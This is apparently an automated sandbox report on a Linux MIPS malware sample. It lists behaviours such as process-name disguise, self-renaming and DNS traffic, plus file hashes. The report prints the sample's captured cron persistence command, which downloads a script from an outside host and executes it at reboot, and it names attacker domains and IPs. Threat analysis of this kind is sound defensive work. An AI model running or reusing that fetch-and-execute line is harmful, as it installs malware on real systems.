Analysis Overview
SHA256
b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840
Threat Level: Shows suspicious behavior
The file b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:49
Reported
2024-10-27 02:51
Platform
debian9-mipsel-20240611-en
Max time kernel
142s
Max time network
139s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
|---|---|---|---|
| Destination IP | 168.235.111.72 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /var/spool/cron/crontabs/tmp.DDLmqg | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
|---|---|---|---|
| Changes the process name, possibly in an attempt to hide itself | [watchdog/0] | /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/mounts | /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf | N/A |
Processes
/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
[/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 168.235.111.72:53 | kingstonwikkerink.dyn | udp |
| CZ | 195.133.92.51:24240 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.DDLmqg
| Hash | Value |
|---|---|
| MD5 | 8c9ff02103c706a091467f66f463d116 |
| SHA1 | 8389f2e1cb1e2bb7034773f88119c45482870a46 |
| SHA256 | e001ff127ebf9d6ceed98f1c5b5326b833864a8473b0e072b64de7315ed8c6f4 |
| SHA512 | da6e9fa9b71115b07d4e4a561800b89732fc20031c955ad9aa11befda0c2567547aa324fb47ad3db536a9dfb93173352d3c3613124b13ae866ac44d77cf8e555 |